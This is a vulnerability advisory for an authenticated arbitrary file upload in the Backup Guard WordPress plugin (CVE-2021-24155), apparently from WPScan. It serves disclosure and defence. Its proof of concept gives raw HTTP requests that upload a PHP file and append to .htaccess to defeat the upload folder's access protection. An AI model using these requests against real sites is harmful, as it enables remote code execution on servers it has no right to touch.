Backup Guard < 1.6.0 – Authenticated Arbitrary File Upload | CVE 2021-24155

Description

The plugin did not ensure that the imported files are of the SGBP format and extension, allowing high privilege users (admin+) to upload arbitrary files, including PHP ones, leading to RCE.

Additional Info, and Bypass of .htaccess protection found by WPScanTeam, while confirming the issue:

There is a protection in place against accessing the uploaded files, via a .htaccess in the wp-content/uploads/backup-guard/ folder, however:
- Some web servers do not support .htaccess, e.g Nginx, making it useless in such case
- Arbitrary content can be appended to the existing .htaccess, to make the deny from all invalid, and bypass the protection on web servers such as Apache

Note: v1.6.0 forced the uploaded file to have the .sgbp extension by adding it if not present, but the file content is not verified, which could still allow chaining with an issue such as LFI or Arbitrary File Renaming to achieve RCE

Proof of Concept

Video of the issue on a Nginx Web server, as sent by the reporter: https://drive.google.com/file/d/1W9faaIZ6rPgrui8lzeY2s9cgKrGJhWTL/view?usp=sharing

Additional Info (WPScanTeam):

As an administrator, open the Backup page (/wp-admin/admin.php?page=backup_guard_backups) and Import a PHP file, which will then be located at /wp-content/uploads/backup-guard/<filename.php>

If the web server supports .htaccess, just import a .htaccess with b as content, which will be appended to the existing .htaccess, making the deny from all become deny from allb and be invalid without raising any error

Raw requests:

POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=b4c6ea799c HTTP/1.1
Host: wp.lab
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://wp.lab/wp-admin/admin.php?page=backup_guard_backups
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------130490272991349650929022108
Content-Length: 229
Origin: https://wp.lab
Connection: close
Cookie: [Admin cookies]

-----------------------------130490272991349650929022108
Content-Disposition: form-data; name="files[]"; filename="info.php"
Content-Type: text/php

<?=phpinfo();?>
-----------------------------130490272991349650929022108--


If .htaccess supported by the webserver, the following request will remove the protection by appending a b to the existing deny from all line:

POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=b4c6ea799c HTTP/1.1
Host: wp.lab
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://wp.lab/wp-admin/admin.php?page=backup_guard_backups
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------130490272991349650929022108
Content-Length: 216
Origin: https://wp.lab
Connection: close
Cookie: [Admin cookies]

-----------------------------130490272991349650929022108
Content-Disposition: form-data; name="files[]"; filename=".htaccess"
Content-Type: text/php

b
-----------------------------130490272991349650929022108--